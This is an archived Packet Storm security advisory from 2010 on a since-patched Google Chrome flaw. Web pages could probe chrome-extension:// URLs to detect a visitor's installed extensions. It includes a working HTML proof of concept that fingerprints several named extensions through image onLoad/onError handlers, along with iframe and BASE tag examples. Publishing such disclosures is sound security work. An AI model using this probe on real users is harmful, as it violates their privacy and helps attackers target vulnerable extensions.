exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Chrome Arbitrary Extensions Detection

Google Chrome Arbitrary Extensions Detection
Posted Sep 8, 2010
Authored by Lostmon | Site lostmon.blogspot.com

Google Chrome suffers from an installed extensions arbitrary detection vulnerability.

tags | exploit, arbitrary
SHA-256 | 52da5016877181aca474a508679782a3b2ff97357ecd8b355f349ada96f2d008

Google Chrome Arbitrary Extensions Detection

Change Mirror Download
######################################################
Google Chrome Instaled extensions arbitrary detection
Vendor url: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify:YES vendor confirmed.YES exploit:YES
######################################################

Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Abstract
#########

How safe is use extensions ?
a attacker can access via iframe to resource extensions ( at this moment i
don´t have found a way to altered information from extensions).

like
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
for example...

a remote user can modify this web doc and call it with meta tag "base"
in a malformed doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
so i thnik that chrome-extension need sanitizacion to don´t access internal
resources from external web pages..( file:/// and other protocols handlers
are safe to use and don´t give access to internal resources from external
web docs...)

So chrome-extension protocol handler can be used to get extensions instaled
on client browser...and them if any extension is vulnerable to something
this information can be used for exploit this extension...

In incognito mode Extensions can be detectable too

###########################
A sample PoC of detection
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Timeline
##############

Discovered:27 may 2010
Vendor notify:01 jun 2010
Vendor patch:02 sep 2010
disclosure: 07 sep 2010

#######################€ND ########################

Thnx To Climbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close